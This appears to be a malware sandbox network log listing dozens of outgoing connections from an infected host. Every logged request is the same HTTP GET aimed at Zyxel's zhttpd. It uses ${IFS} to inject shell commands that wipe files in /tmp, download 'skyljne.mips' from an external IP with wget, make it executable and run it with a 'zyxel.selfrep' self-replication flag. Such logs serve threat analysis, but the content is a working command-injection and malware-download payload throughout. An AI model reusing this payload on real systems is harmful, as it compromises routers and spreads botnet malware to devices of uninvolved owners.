                                                Jan 12, 2024 18:16:33.707432032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7082192.168.2.2356684142.248.91.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707498074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7083192.168.2.2345190120.132.9.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707564116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7084192.168.2.2348266173.69.244.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707626104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7085192.168.2.23535409.249.85.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707694054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7086192.168.2.23368889.147.113.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707741022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7087192.168.2.2358828146.56.118.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707823992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7088192.168.2.2349010212.145.196.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707895041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7089192.168.2.234413070.151.137.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.707933903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7090192.168.2.235689088.69.86.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708003044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7091192.168.2.234328447.240.55.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708066940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7092192.168.2.2339680135.208.235.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708106041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7093192.168.2.234928238.99.132.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708189011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7094192.168.2.2360520172.15.49.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708240032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7095192.168.2.233649247.59.108.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708285093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7096192.168.2.233467851.70.253.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708338976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7097192.168.2.235241644.108.4.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708410978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7098192.168.2.2335294169.101.62.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708456039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7099192.168.2.2340060147.226.64.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708522081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7100192.168.2.233352624.129.61.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708575964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7101192.168.2.2346108140.200.176.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708638906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7102192.168.2.236067248.83.107.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708688974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7103192.168.2.2333656128.186.28.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708740950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7104192.168.2.235402278.199.11.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708795071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7105192.168.2.2347534167.239.237.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708842993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7106192.168.2.2345370163.225.85.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708914995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7107192.168.2.235406067.115.139.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.708949089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7108192.168.2.234940878.236.235.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709012032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7109192.168.2.233908681.211.8.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709060907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7110192.168.2.2341730107.116.134.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709126949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7111192.168.2.233855014.49.3.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709178925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7112192.168.2.2351956210.108.19.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709225893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7113192.168.2.2353050204.0.112.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709278107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7114192.168.2.234149440.53.146.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709345102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7115192.168.2.2343738200.110.39.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709387064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7116192.168.2.234609283.100.254.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709477901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7117192.168.2.234792876.92.165.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709521055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7118192.168.2.2356800220.133.109.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709583044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7119192.168.2.2347446205.17.131.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709639072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7120192.168.2.234915631.2.13.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709691048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7121192.168.2.233704664.249.7.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709731102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7122192.168.2.2333230124.189.60.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709810972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7123192.168.2.2338706135.158.172.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709846973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7124192.168.2.2348868185.198.213.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709917068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7125192.168.2.2344772124.122.66.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.709980965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7126192.168.2.2357846167.97.42.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710048914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7127192.168.2.2348542221.64.220.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710079908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7128192.168.2.234515873.108.111.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710141897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7129192.168.2.2338792157.49.138.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710201025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7130192.168.2.2351914151.221.144.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710232973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7131192.168.2.2360748163.123.246.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710300922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7132192.168.2.234701835.243.5.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710360050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7133192.168.2.2351448101.239.36.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710414886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7134192.168.2.2353092110.6.110.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710491896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7135192.168.2.2350290132.171.242.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710541964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7136192.168.2.2336880162.40.103.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710582018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7137192.168.2.2350556159.118.93.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710645914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7138192.168.2.233425037.59.115.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710684061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7139192.168.2.2333582137.231.130.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710750103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7140192.168.2.233688246.9.118.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710797071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7141192.168.2.235361696.210.38.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710856915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7142192.168.2.2348728143.188.131.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710917950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7143192.168.2.2338790146.115.112.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.710939884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7144192.168.2.2338596151.226.116.213443
                                                TimestampBytes transferredDirectionData
